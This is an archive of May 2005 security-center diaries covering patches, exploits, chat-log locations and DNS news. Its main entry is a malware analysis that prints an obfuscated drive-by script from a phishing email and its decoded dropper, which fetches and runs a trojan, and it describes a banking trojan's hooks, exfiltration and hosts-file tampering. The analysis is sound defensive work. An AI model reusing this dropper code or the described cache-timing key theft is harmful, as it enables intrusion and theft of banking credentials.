MSN Messenger 7.0: C:\Documents and Settings\<windows login>\My Documents\My Received Files\<IM handle>\History

Yahoo Messenger 6.0: C:\Program Files\Yahoo!\Messenger\Profiles\<IM handle>\Archive\Messages

AOL Messenger: C:\program files\users\default\log\AIM\Query

Miranda Messenger: C:\Program Files\Miranda IM\Logs

mIRC: C:\program files\mirc\logs (if enabled)

Trillian 3.1: C:\Program Files\Trillian\users\default\logs

Exodus 0.9.x: C:\Documents and Settings\<username>\My Documents\Exodus-Logs\<user>_<server>.html

GAIM: On unix, they are in ~/.gaim/logs, on win32 they are in the $drive\Documents and Settings\user\Application Data\.gaim\logs directory. In either case, new logs (new as of 0.73) are in subdirectories that correspond to protocol/yourscreenname/theirscreenname.

iChat: /Users/<logon name>/Documents/iChats

Microsoft Security Advisories

Microsoft has recently started a pilot program of issuing Microsoft Security Advisories, which aim to provide guidance and information about security-related software changes or software updates. These are not the same as the Security Bulletins, which are published on a monthly basis; an advisory may be released within one business day of Microsoft being notified of an issue.

For those concerned about the security of Microsoft products, this is another place you should not miss.

You can read the details at:


Published: 2005-05-13

Thanks for info on chat monitoring; PandaLabs report; Hyper-Threading vulnerability

It has been a relatively quiet black Friday. We have received a lot of help and valuable feedback on how to capture chat logs. Thanks a lot to those who have contributed.

PandaLabs quarterly report

PandaLabs has written a quarterly report on the malware trend and analysis from January to March 2005. It is an excellent read for all to understand the risk we are dealing with on the Internet these days.


Information leak vulnerability on processors with Hyper-Threading

A few readers wrote in today about a vulnerability on processors with Hyper-Threading technology. Due to the sharing of resources between threads, a malicious thread (e.g. a Trojan) can monitor other threads that are executing on the same machine and retrieve sensitive information (e.g. an encryption key). The mechanism is a cache-timing side channel: the two hardware threads share the processor's cache, so a spy thread that keeps timing its own accesses to a cache-sized buffer can see which lines the victim thread evicts and recover the victim's memory access pattern; where that pattern depends on key material, as in an RSA implementation with key-dependent table lookups, the key leaks.


Handler on Duty

Jason Lam

jason /at/ networksec.org


Published: 2005-05-12

Firefox 1.0.4; DNSSEC Tools; Phishers' Benefit from Using Google Links; Viewing Chat Logs; Web Browser Forensics; Gecko Based Browsers HTTP Authentication Prompt Vulnerability

Firefox 1.0.4 Released.

Firefox 1.0.4 has been released, fixing remote code execution flaws in its JavaScript and DHTML handling.

For more information http://www.mozilla.org/products/firefox/releases/1.0.4.html


The DNSSEC Tools project has released its first alpha version. According to its web site, the project aims to ease the deployment of DNSSEC-related technologies.

What benefits do phishers get from using Google links?

We've seen phishers use Google links when they send out phishing scams. We thought the benefits were a free redirect and evasion of URL filters. What other benefits do phishers get? If you have any information or ideas, please use our contact form at
http://isc.sans.org/contact.php to send them to us.

Comment from Jozef Hatala: it prevents SpamCop from filing a complaint with the actual ISP hosting the phisher's website.

Viewing Chat Logs.

We were asked today to assist a concerned parent in finding chat logs on a child's computer. We believe that many of our readers may already be doing this and solicit your ideas and comments. We plan to publish a short (two to three pages) guide for parents and school administrators on how to look for chat logs, and are looking for the specific locations of AIM, ICQ, MSN, etc. chat clients plus any other tips that you might have to offer. Use our contact form at
http://isc.sans.org/contact.php to send them to us.

Here are some chat log locations.

MSN Messenger 7.0 : C:\Documents and Settings\<windows login>\My Documents\My Received Files\<IM handle>\History

Yahoo Messenger 6.0 : C:\Program Files\Yahoo!\Messenger\Profiles\<IM handle>\Archive\Messages

AOL Messenger : C:\program files\users\default\log\AIM\Query

Miranda Messenger :C:\Program Files\Miranda IM\Logs

Web Browser Forensics.

SecurityFocus has updated its Web Browser Forensics article. The document introduces tools and techniques to reconstruct files cached by Mozilla Firefox browsers. One of the tools mentioned supports cache viewing for Netscape Navigator, Mozilla, Opera and IE caches.

Gecko Based Browsers HTTP Authentication Prompt Vulnerability.



Handler on Duty

Kevin Hong (khong-at-kisa.or.kr)


Published: 2005-05-11

SANS/ISC Webcast; MS05-017 Exploit; They're Baaaaaack...; Follow the Bouncing Malware : A Fresh Bounce (Updated: 22:30 GMT)

Note: Viewing this diary may very well set off your antivirus software. If it does: tough. Nothing in here is Evil (at least in the incarnation that it appears here.) If you write me to tell me that it set off your AV, I’ll quite possibly write back and make fun of you. You’ve been warned.

SANS/ISC Webcast Today

Be there... Aloha.

MS05-017 Exploit

An exploit for MS05-017 (that place-holder "0" in front of the 17 inspires confidence, doesn't it?) is now available as part of the Metasploit Framework, so if you aren't patched... well, why aren't you?

MS05-017 (Vulnerability in Message Queuing Could Allow Code Execution / CAN-2005-0059 / KB892944) was part of Microsoft's April 2005 release, and more information can be found here.
I've not had a chance to test this yet, but H.D. is pretty amazing, so I don't have much question that it works.

They're Baaaaaaaaaaaaaack....

Rumor has it that Microsoft will re-release the MS05-019 security update in June, 2005 correcting their removal of raw sockets...

Follow the Bouncing Malware: A Fresh Bounce

Well, some people have pointed out that it’s been quite some time since I last posted a “Follow the Bouncing Malware” installment and... well... due to the overwhelming demand (thanks Mom...) here we are.

I thought I would take a look at something more recent - something that might have landed in your inbox sometime over the past couple of weeks, and so I’ve subtitled this journey: A Fresh Bounce.

Disclaimer: None of the links in the following account are “clickable”. There is a very good reason for that. If I make the links clickable, some yahoo out there will click them. If you insist on playing with these sites you’ll need to at the very least, cut and paste to do it. If you infect your machine, don’t even think of blaming me. If you write me to tell me that you infected yourself, I’ll quite possibly write back and make fun of you. You’ve been warned.

Just the other day, I received the following urgent message via a mailing list address at incidents.org. Poor li’l Sasha was obviously in need of some help:

Delivered-To: xxxxxxxxxxx@gmail.com
From: Sasha NOBLE <xxxxxxxxxxx@roxette.org>
To: xxxxxxx@incidents.org
Subject: Help me
Date: Wed, 04 May 2005 11:15:39 +0000

Hello, Lucas! some help sunburned normal. how ray backbit me violently?
repeatedly position wrought my east except blood. i overrode a boiling
dad beyond science. kindly. their tight spring under office, which sneaked
future, elastic current. Norman felt that stiff list. i drew Marlen who
ridded me Jabari! she dug elastic arm, that interbred foolishly... beyond
interest dowed tin, authority withdrew above the expert toward sad boat:
you misread her ready decision aboard our special expansion, who laid
wearily. a bright balance swam considering our idea; elastic, angry wall.
black drink sock cost, he hoised yearly, deliberately, tenderly. this good
brass came from his offer; rough, possible paper. he wound your future
dress for the private chief, which miscast exactly. she gave him separate.
i outputted clear surprise, which misunderstood obnoxiously... bent the
general play,


Ok... Maybe it was Jude who was in need of help... Or Lucas.... or Norman... or Marlin... or... Jabari...

But I digress...

Suffice to say that someone, somewhere, was in urgent need of my help. And a grammar checker.

How could I possibly ignore their plea?

Well, if I were like most of the rest of you heartless swine, I would simply click the “delete” button on Outlook. But, to quote the Kink^Hg of Pop in a distant yet eerily prescient incarnation of himself, “I’m not like the other guys...” and so I started to click the delete button in Thunderbird.

But I couldn’t bring myself to do it.

The dang batteries on my cordless mouse chose that moment to go dead.

Having had far too little sleep, and far too much caffeine, I seized on this as some sort of sign, (I have a tendency to do that... sometime I’ll tell you the story of the Twinkie that, for several months, I believed was the reincarnation of my recently deceased cat...) and decided to swap in some fresh double-A’s and investigate what might be troubling Sasha/Jude/Lucas/Norman/Marlin/Jabari (hereinafter referred to as SJLNMJ).

Disjointed thoughts and poor punctuation were the least of SJLNMJ’s issues. There was Evil lurking in this message: HTML.

Email messages are supposed to be text, thank you. Text. Only text. If God had intended for email to be written in HTML, then the traditional signoff of prayers would be </amen>.

But, I digress...

While the text portion of SJLNMJ’s message reads like James Joyce on crack, perhaps a review of the HTML portion of SJLNMJ’s message would make things clearer:

Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

<HTML> <BODY> <FONT face="Verdana, Arial"> Hello, Lucas!
some help sunburned normal. how ray backbit me violently? repeatedly
position wrought my east except blood. i overrode a boiling dad beyond
science. kindly. their tight spring under office, which sneaked future,
elastic current. Norman felt that stiff list. i drew Marlen who ridded
me Jabari! she dug elastic arm, that interbred foolishly... beyond
interest dowed tin, authority withdrew above the expert toward sad boat:
you misread her ready decision aboard our special expansion, who laid
wearily. a bright balance swam considering our idea; elastic, angry
wall. black drink sock cost, he hoised yearly, deliberately, tenderly.
this good brass came from his offer; rough, possible paper. he wound
your future dress for the private chief, which miscast exactly. she gave
him separate. i outputted clear surprise, which misunderstood
bent the general play,

<img width=50 height=100 style="display:none"><div

Ah! That’s so much clearer. (Okay... I lied. It’s still gibberish.)

Hey! What’s that at the end? An OBJECT tag! Oooo! How fun!

Let’s see where it leads!

(Note: I said “let’s,” but face it, I really didn’t mean it. Remember: Don’t even think about trying this yourself, boys and girls. You stay here... I’ll go in first...)

(Note #2: I’m talking to you, Mr. “I Know What I’m Doing.” Don’t try it.)

Grabbing the results of that PHP script with the parameter “action=click,” gives us the following:

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
APPLICATIONNAME="Plugin pre-Installer"
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
<SCRIPT language="VBScript">
If InStr(EP,"cgi-bin")<>0 Then
CGIP=EP & "pscounter.cgi"
CGIP=EP & "cgi-bin/gen/pscounter.cgi"
End If
IP= CGIP & "?action=install"
Set oSA = CreateObject("Shell.Application")
On Error Resume Next
oSA.ShellExecute "mshta",IP
If Err.number <> 0 Then
Cmd="mshta " & IP
MSplay.Run (Cmd),1,FALSE
End If

Now I’ve never claimed to be a JavaScript guru (why would anyone claim such a thing publicly?) but it seems pretty obvious that this little gem is intended to take us right back where we came from but using the parameter “action=install” this time.

And so, with reckless abandon, complete disregard for personal safety, and a 20 oz Mountain Dew, I returned to the Russian oil bank, lookin’ for a little action... uh... equals install:

(Remember... I’m 10’ tall and bulletproof. You’re not. Don’t try this at home.)

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
APPLICATIONNAME="Plugin Installer"
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228">
0t$0#%CPEZ+#TDSJQU? gvodujpo
Em(Sq-Mo-St-emm*|usz+#tBY>voftdbqf(%52EPEC%3fTusfbn*<wbs pT>ofx

<quite literally, TONS of gibberish deleted>";

l='\0\t\n\r-­ !"#$%&\'()*+,-./0123456789:;<=>?@
for (i=0;i<d.length;i++){b=d.charAt(i);a=l.indexOf(b);if (a==1) a=9;if
(a==2) a=10;if (a==3) a=13;if (a==4) a=34;if (a<=31 &
if (a>0){ if (a>=41) a=a-1; s=s+l.charAt(a);} else

Dang... It looks like a dictionary threw up. (Note: The above is an inexact replica of the actual file that I downloaded. Some of the characters in the original can’t be displayed properly in the diary. Sorry ‘bout that.)

And now, dear reader, I’m going to let you in on a little secret. Please understand though that what I’m about to tell you must remain absolutely confidential... it’s super top secret: All of that stuff up there...

...it’s encoded.

Somebody has written some stuff that THEY DON’T WANT US TO SEE.

Shhhh... don’t tell anyone.

Ok. So perhaps that was... well... blatantly obvious.

But what isn’t obvious is how we’re going to deal with this stuff. Get ready boys and girls, ‘cause kindly ol’ Dr. Tom is gonna take you on a trip down Reverse Engineering Lane and hopefully teach you a thing or three about how to deal with this kind of code obfuscation all on your own.

Now, many years ago, back when I was younger, dumber, and more energetic, I would have banged together some perl code to try to make some sense out of that wad of characters. Time has mellowed me, however, and I’ve come to understand that youthful energy and enthusiasm can nearly always get the daylights kicked out of it by the lazy deviousness that comes with age. “Why work harder when you can work smarter?” and several other clichés of that ilk come to mind. I’ve come to a place in my life now, where I can cause my adversary to use his own skills against himself, much like Road Runner always does to Wiley Coyote. (I bet you thought I was going to go for some Zen/Kung Fu reference, didn’t you...)

Disregarding the “data” in the above JavaScript, a quick look at the actual functional portion reveals some interesting things. The code will decode the data and write it into a live HTML document using that “document.writeln()” call. That “document” will then execute and, presumably, do something... probably something Bad. But... what if we could co-opt that process and use it to show us the decoded document?

It turns out that it’s not too difficult to accomplish that.

Because JavaScript has far more capabilities when run from your local machine than it ever does when run from a website, we’ll use that difference to our advantage. By inserting a call to an ActiveX component, we can actually open a file on our test machine. We’ll then make a slight alteration to the original script function, and we’ll be able to use the script itself to write out the decoded content.

Whoa... it almost sounds like I know what I’m talking about, doesn’t it?

Before I continue, please note: Never, EVER do this on a production machine. Never do this on a machine that will be used for anything else. Never do this on any machine connected to the network. Never do this on a machine you’re not prepared to format and reinstall. Never, EVER, spit into the wind.


So... we’re going to stick the following snippet into the JavaScript up near the beginning, right after the <SCRIPT LANGUAGE="JavaScript"> line:

var fso, output;
// Scripting.FileSystemObject is only reachable from a script running in the local machine zone
fso = new ActiveXObject("Scripting.FileSystemObject");
// OpenTextFile(path, iomode, create, format): 8 = ForAppending, 1 = create the file if missing,
// -2 = TristateUseDefault (system default encoding)
output = fso.OpenTextFile("C:\\test.txt" , 8, 1, -2);

Then, we’re going to change the “document.writeln()” function call at the end of the code to be a call to “output.write()”

Why? Well, that first snippet will create a FileSystemObject which it then uses to open a file called “test.txt” on the root of our C: drive. The “handle” to the output file is called, conveniently enough, “output.” We then change the call from document.writeln() to a call to output.write() and anything that was going to be written into the live HTML document will now go into our output file.

We then fire the newly edited script off in Internet Explorer on a convenient sacrificial box and lo! We find the decoded output in C:\test.txt.

Now someone, somewhere, spent a great deal of time thinking up that whole “encoding” scheme. Several hours were spent, huddled over a keyboard creating the functions to both encode and decode that gibberish, and we just blew it all away with about two minutes work. As you can see, it didn’t really “hide” much of anything from us... Perhaps that anonymous programmer’s time would have been better spent taking... say... an ethics class...

Looking for a real job...

Learning to program in a real language...

But I digress...

The output in my “test.txt” file looked like this:

<TEXTAREA id="Main_HTA">
function Dl(Rp,Ln,Rs,dll)
var oS=new ActiveXObject(sAX);
var oX=new ActiveXObject("Microsoft.XMLHTTP");
var XB=oX.responseBody;
var oA=new ActiveXObject("Shell.Application");
if (dll==0)
Cmd=Ln+" "+Rs;
<IFRAME name="icounter" src="about:blank" width=10 height=10></IFRAME>
<SCRIPT language="VBScript">
ssfDESKTOP = 0
ssfWINDOWS = 36
ssfSYSTEM = 37
Dim oShellApp
Dim oFolder
Dim oFolderItem
Dim PluginFile
Dim WinDir
Dim EnvStrings
Dim Font_Path_Components
Dim XMLBody
Dim cByte
Dim ByteCode
Dim Main_HTA_Body
Dim Cmd_Params
Dim Module_Path
Dim Trojan_Path
Dim IntervalID
Dim nCmdCalled
If InStr(Exploit_Path,"cgi-bin")<>0 Then
CGI_Script_Path=Exploit_Path & "pscounter.cgi"
CGI_Script_Path=Exploit_Path & "cgi-bin/gen/pscounter.cgi"
End If
document.frames(0).location.href = CGI_Script_Path & "?action=finish"
self.MoveTo 6000,6000
ExeName=ExeName & ".exe"
DllName=DllName & ".dll"
HTAName=HTAName & ".hta"
Set oShellApp = CreateObject("Shell.Application")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName
DllName=WinDir & DllName
HTAName=WinDir & HTAName
On Error Resume Next
Set oFolderItem = oFolder.ParseName("Symbolw.ttf")
If Err.number <> 0 Then
Call Run_Installer
If LinkPath="" Then
Call Run_Installer
End If
End If
setTimeout "HangUp()",9000
Sub Run_Installer
Download_Call="Dl('" & Trojan_Path & "'" & "," & "'" & ExeName & "'" &
"," & "'',0);"
Main_HTA_Body= Main_HTA_Body & Download_Call
Main_HTA_Body= Main_HTA_Body & "self.close();</SCR" & "IPT></BODY>"
' Prepare the string that will be passed to cmd.exe
Select Case WinOS
Case "NT"
Call Download_and_Execute(Trojan_Path,ExeName,"",0)
Cmd_Params="cmd /c copy " & TestName & " " & xTestName
MSplay.Run (Cmd_Params),1,FALSE
Case "2K"
' Create an additional HTA file (can't be greater than 1000 bytes)
Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName
oShellApp.ShellExecute "cmd",Cmd_Params,"open"
oShellApp.ShellExecute "mshta",HTAName
Cmd_Params="/c copy " & TestName & " " & xTestName
oShellApp.ShellExecute "cmd", Cmd_Params
Cmd_Params="/c del " & HTAName
Case "XP"
' Create an additional HTA file (can't be greater than 1000 bytes)
Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName
oShellApp.ShellExecute "cmd",Cmd_Params,"open"
oShellApp.ShellExecute "mshta",HTAName
Cmd_Params="/c copy " & TestName & " " & xTestName
oShellApp.ShellExecute "cmd", Cmd_Params
Cmd_Params="/c del " & HTAName
Case Else
Call Download_and_Execute(Trojan_Path,ExeName,"",0)
Cmd_Params="command /c copy " & TestName & " " & xTestName
MSplay.Run (Cmd_Params),1,FALSE
End Select
End Sub

Sub Download_and_Execute(Remote_path,Local_name,Run_params,Run_by_Rundll32)

set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")
If GetStatus=0 Then
Set PluginFile=MSmedia.CreateTextFile(Local_name, TRUE)
For j=1 To Plugin_size
If Run_by_Rundll32 = 0 Then
Cmd=Local_name & " " & Run_params
Cmd="rundll32" & " " & Local_name & Run_params
End If
On Error Resume Next
MSplay.Run (Cmd),1,FALSE
End If
set oXMLHTTP=Nothing
End Sub

Function HangUp()
End Function

Function Delete_HTA(params)
If nCmdCalled<4 Then
oShellApp.ShellExecute "cmd",params
End If
End Function

Function Get_Win_Version()
If InStr(IEversion,"Windows 95") <> 0 Then
ElseIf InStr(IEversion,"Windows NT 4") <> 0 Then
ElseIf InStr(IEversion,"Win 9x 4.9") <> 0 Then
ElseIf InStr(IEversion,"Windows 98") <> 0 Then
ElseIf InStr(IEversion,"Windows NT 5.0") <> 0 Then
ElseIf InStr(IEversion,"Windows NT 5.1") <> 0 Then
End If
End Function

Function WriteFile
End Function

Function GetFile
On Error Resume Next
If Err.number <> 0 Then
End If
End Function

Function OpenSession
Req_type="G" & "E" & "T"
End Function

Function GenerateName()
Loop While ik<rr
End Function

Function InitPaths
End Function


Well now. Ain’t that purty? I really do appreciate the way that they’re not even attempting to rationalize what they’re doing... with variable names like “Trojan_Path,” staring you in the face, it’s sorta’ hard to keep up the charade that you’re writing an app for “market research.”

Speaking of “Trojan_Path” let’s see what we find at the other end...

The file divx.exe is a Win32 executable, 21,536 bytes long. Taking a quick look at the file reveals that it has been packed with FSG and has a really mangled PE header and a tiny, really whacked MZ header. Once again, someone is trying to hide something...

Packed / obfuscated executables are nothing more than an annoyance. They don’t stand up to a determined effort to unpack them because, like the “encoding” we just blew away, packed executables always carry the keys to the kingdom along with them. Generally with a little coaxing, they give up their secrets. FSG is no exception, and with a bit of effort, I was able to unpack the divx.exe executable. When I did, I found all sorts of interesting stuff...

When executed, divx.exe copies itself to the windows\system32 folder under the name winldra.exe, installs a key to launch itself in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and dumps several DLL files in the system32 folder. These DLL files are used by the executable to latch itself into the Windows CBTProc hook, a rather dubious “feature” of the operating system that was intended to be used by Computer Based Training programs to monitor what’s going on in the active window. According to Microsoft, “The system calls this function before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the keyboard focus; or before synchronizing with the system message queue. A computer-based training (CBT) application uses this hook procedure to receive useful notifications from the system.”

“Useful notifications”...


Pretty darned useful, if you’re a virus.

With that viewpoint, the program watches for access to several banking sites:


There are also some shenanigans done with several citibank.de hosts, but I’m not entirely sure how that works...

Ever helpful, the program then corrects any math errors the user may make while using the site.

(Just checking to see if you were still paying attention...)

It actually captures text within any browser session associated with one of those sites saving it in a file and sending it off via email. Then, in a fit of pique and poor grammar, it commemorates the occasion with a registry entry:

HKCU\Software\SARS\mailsended = 1

Really nice, eh?

It also takes the, now passé, step of diddling with the user’s hosts file and routing a large list of antivirus vendor sites to the loopback address.

FYI: When I first started playing with this chunk o' malware I sent it off to all of the major AV vendors and it should currently be identified by their signature files. Attempts were made to get the offending sites shut down as well.

So after all of that, I suddenly find myself re-thinking the whole “good Samaritan” thing where ol’ SJLNMJ is concerned. Yes, SJLNMJ needed help alright... he/she/they/it needed help to the funds in my online bank account (of which I have none...)

I’ve learned my lesson - helping others is bad. The crooks and thieves of this world rely on and use our better natures against us. You won’t catch me making THAT mistake again...

Hey! Lookie here! There’s this dude in Nigeria that has to find a way to get $50,000,000 US out of the country... all he needs is a little help.


Handler on Duty

Tom Liston - Intelguardians Network Intelligence, LLC - tom at intelguardians dot com


Published: 2005-05-10

MSFT Patches / DrudgeReport headline - ...huge computer attack...

Note: I'm updating the current (2005-5-11) Diary. It'll be back in a bit -TL

MSFT Patches

We are waiting for the release of MSFT Patches to post more details here. As already pointed out in the advance bulletin, we should expect 1 patch rated as Important.


MSFT Patches are out.

As described in the previous statement, there is 1 patch in this release.

This one is the MS05-024, and will affect only Windows 2000 with SP3 and SP4.

Windows 98, 98SE or ME? Hummm, MSFT has a surprise for you...:)..."Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) – Review the FAQ section of this bulletin for details about these operating systems."...Which is: "Are Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?

No. Although Windows Millennium Edition does contain the affected component, the vulnerability is not critical."...no Patches for you, baby...

The MS05-024 bulletin refers to a "Vulnerability in Web View Could Allow Remote Code Execution (894320)".

Although it has an Impact of Remote Code execution, it is rated as Important. In Microsoft severity rating, Critical is "A vulnerability whose exploitation could allow the propagation of an Internet worm without user action.".

According to the advisory, there is a problem in the way Windows Explorer "handles certain HTML characters in preview fields.". A typical attack scenario is in the workaround section: "In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability." "...an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's Web site. After they click the link, they would be prompted to perform an action. An attack could only occur after they performed these actions."

Our good reader Juha-Matti wrote that this Microsoft patch will fix the flaw, published only five months ago, at http://www.greymagic.com/security/advisories/gm015-ie/ , discovered by Grey Magic Software with a Bugtraq ID 13248. Good Work!
#include <sarcasm.h>

The Malicious Software Removal Tool was also updated today. The url to check it is at http://www.microsoft.com/security/malwareremove/default.mspx .

More information about MS05-024:

DrudgeReport Headline - "...huge computer attack..."

We are receiving a lot of questions regarding a headline posted at the Drudge Report. If you didn't read it yet, the headline is: "FEDS INVESTIGATE HUGE COMPUTER ATTACK; WORLDWIDE HUNT FOR 'STAKKATO'". The link actually points to a New York Times report.

Another link to the same story.

We are still trying to get more details to post here, but one thing that must be noticed is that it is not only the Defense Department but also Cisco and a few others that are involved.


Handler on Duty: Pedro Bueno (pbueno/AT/isc.sans.org)


Published: 2005-05-09

IPsec vulnerability and more public Ethereal exploits!

IPSec vuln announced

NISCC has posted an advisory for IPsec implementations. It seems that any configuration of IPsec that uses ESP, IP protocol 50 (Encapsulating Security Payload), with confidentiality (encryption) only is affected. In addition, some configurations of AH (Authentication Header), IP protocol 51, are reported to be affected as well.

The impact of this vulnerability is huge (well, assuming that you aren't using data integrity already), as the attacker could get the plaintext version of the communication. As was pointed out to me by an ISC reader, the default on most VPN servers is to include data integrity with ESP. This is one good case where most people probably don't stray too far from the default config *sic*.

Principal workaround: Ensure that you use ESP with integrity protection.

Link: http://www.niscc.gov.uk/niscc/docs/al-20050509-00386.html?lang=en

More Ethereal exploits made public

Ethereal is a fantastically useful tool to the network analyst. It can decode over 460 protocols, including the Quake III Team Arena gaming protocol!!! Now for the downside. Writing protocol parsers is not an easy task. It's OK to interpret how a packet is "supposed" to look. What about the edge cases? What about failing gracefully? This is where a lot of the protocol parsers are failing us.

Recently I was speaking with the venerable godfather of "those_who_wear_tin_foil_hats", Ed Skoudis, about a very scary concept: IDS killer packets. The idea is that you kill whatever monitoring tools might be on the network first, then you install the malicious code and take over the box.

This past year we have seen dozens of Ethereal vulnerabilities (both DoS and exploitable), a few Tcpdump denial of service vulns, and of course the biggies: buffer overflow and DoS in Snort, and a worm (Witty) that whacked ISS intrusion detection software. In fact, the Witty worm exploited a vulnerability in the Protocol Analysis Module for ICQ (yes, another protocol parser bug).

The point is not to harp on the developers; we know it's not easy to get right. The point is that we all need to take extra care in patching our security infrastructure.

Today, two new exploits for Ethereal were made public. Ethereal 0.10.11 is apparently not vulnerable to these.

Mike Poor


Handler on Duty - signing out

./mike &


Published: 2005-05-08

Firefox 1.0.3 Alternate Workaround; OhMyGodGoogleIsGone!, Update: IPSec vuln announced

Firefox 1.0.3 Alternate Workaround

Thanks to VMM for pointing out that an alternate (and perhaps better) workaround for the recently announced remote code execution flaw in Firefox 1.0.3 is to disable “remote software installation,” rather than disabling all Javascript. In the Win32 version of Firefox, this is accomplished by:

Tools | Options | Web Features | and clearing the “Allow web sites to install software” checkbox.

Two Notes:

1) There is some question as to the availability of this setting in Firefox on platforms other than Windows... YMMV.

2) While this seems like a reasonable workaround, it has not been tested.


A few weeks back, when we reported some fairly widespread incidents of DNS Cache poisoning, we had quite a few people claiming that we were full of beans. Eventually, as we were able to piece together the full picture, we were proven right. (And, try as I may, I can’t recall receiving an apology from any of the folks who said we didn’t know what we were talking about...)

Flash forward to Google’s recent outage, and suddenly “DNS Cache Poisoning” is the first word on everyone’s lips.

Sometimes I think the communal-mind created by the entire online community wears big, fuzzy, pink slippers, lives in a double-wide, and has a lifetime subscription to the Weekly World News.

Of course, we all know that nothing on the Internet is ever as it seems...

Google went bye-bye for 15 minutes. Or perhaps it was an hour. It depends on who you ask... (or how long your DNS server cached the bogus information).

This is, of course, one of several signs that Nostradamus predicted would signal the end days.

And while several people were quick to expound theories about what caused the outage, we prefer to stick with the simplest explanation (which is also what Google is saying...): it was a DNS issue. Somebody in charge of Google’s DNS did something dumb.

It fits the facts as we have heard them (“google.com” unavailable, but still reachable if you used the IP address).

But what of the mysterious “redirects” to other search pages? Yesterday we reported that readers were seeing some suspicious “redirects” to an alternate search engine called “SoGoSearch.” It turns out that “SoGoSearch” owns the domain name “com.net,” and the machines “www.google.com.net” and “google.com.net” lead you to their search engine. So... if an overzealous browser tried to “fix” an unavailable “google.com,” it’s quite likely that you could end up looking at the SoGo search engine.

As an aside: The fact that you can do a WHOIS lookup and find a listing showing:


doesn’t mean that the entire DNS system has been compromised. It simply means that someone with far too much time on their hands registered their nameserver with that goofy name.

Such childish stunts are widely acknowledged to increase your attractiveness to the opposite sex. Failing that, you can always slip on your big, fuzzy, pink slippers and spend your nights reading the Weekly World News.


Handler on duty : Tom Liston - tom at intelguardians dot com


Published: 2005-05-07

Google Web Accelerator continued; phpBB 2.0.15 released; Backdoors more popular than Viruses?; Anti-Spyware poll results; Google.com DNS glitch; SQL server 2000 SP4

Final Edition

Google Web Accelerator continued

For a Saturday, we got quite some feedback on the item about Google's new Web Accelerator.

On one end of the story we see reactions that both trust Google to do the right thing due to their "do no evil" motto, as well as comparing them to Microsoft's new retrieval system for documents in case of application crashes.

The other end of the story sends us comments on other projects involving web caches, such as:
- "poor man's Akamai" solutions such as , a network of proxy caches.

- solutions that also check contents of ssl protected http traffic (https). This latter is obviously not appreciated from a security viewpoint. Richard pointed out what's probably the most nasty one of this category. While they don't want to be called spyware, have a look at an excerpt from their description at
http://www.marketscore.com/privacy.aspx : "Once you install our application, it monitors all of the Internet behavior that occurs on the computer on which you install the application, including both your normal web browsing and the activity that you undertake during secure sessions, such as filling a shopping basket, completing an application form or checking your online accounts, which may include personal financial or health information."

Personally I don't believe much in caches, on the one hand because they don't save enough bandwidth to be worth the trouble, on the other because of all the complications they create. Worse, unless you have a slow link in the path to the destination server there's nearly no measurable gain in performance, as the bottleneck usually is the browser's ability to render pages fast enough.

As for Google's cache: time will tell.

One thing is sure however: web developers and security folks will have to deal with this eventually. Expect clients to prefetch information, so don't assume the user did anything, it's all like a spider running over the pages.

phpBB 2.0.15 released

As we reported on phpBB issues, phpBB released today (yes, on a Saturday) a new release: 2.0.15 . Among the fixes are authentication fixes for the admin panel and one critical fix in the handling of bbcode.

Download from:


Update notification:


Considering the level of attention phpBB gets, we highly recommend upgrading or patching soon. Don't forget to update both the database and the individual files.

Backdoors more popular than Viruses?

A reader pointed out that "backdoor.hackdefender" was rather popular at . Looking at the top 10, it shows that most of the top 10 are backdoors.

Perhaps time to make a mental note that although backdoors typically don't have fast rates to spread they do seem to be widely available in the wild.

Add to that that cleaning up from a backdoor is tricky business: what else was installed/changed/... while the backdoor was installed ? Typical viruses are much more predictable and therefore easier to clean up.

As such it might be a good moment to check the risk levels of backdoors in your organization and perhaps take some more measures.

Let us know what you think about it. If you do have extra measures in addition to the typical anti-virus measures to counter the threat of backdoors, let us know which.

Anti-Spyware poll results

Reviewing the anti-spyware poll results is like reading your logs. From our community of security minded readers it's easy to see the trend towards people aware of the problem and aware of the Windows/Internet Explorer combination being targeted by spyware.
As such the results are a bit predictable, but if you answered that you don't use anti-spyware and are using that combination, or if you are using anti-spyware that proves not to be working properly, try some of the suggestions the other readers left:

- HijackThis! (for advanced users)
- IEspyad
- Lavasoft Ad-Aware
- Microsoft antispyware (beta)
- Spybot S&D

This is not an endorsement, nor do we claim it's a complete overview.
Take care with HijackThis: it can destroy a Windows machine if used
without the proper knowledge.

Keep in mind that if/when other browsers or OSes become popular and/or vulnerable enough, the attention of the spyware folks might shift suddenly.

A solution that works for larger organizations would be a good selling argument for the vendors.

Exploit against Firefox 1.0.3

Speaking of other browsers and being vulnerable, FrSIRT (aka K-OTik) published a 0-day exploit against Firefox 1.0.3.

Impact: remote code execution without user interaction

Patch: none available

Workaround: disable javascript

Google.com DNS glitch

We're getting a lot of reports regarding a glitch in google's DNS information. On first looks it seems not to be hostile.

$ dig news.google.com
; <<>> DiG 9.2.3 <<>> news.google.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61748
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;news.google.com. IN A
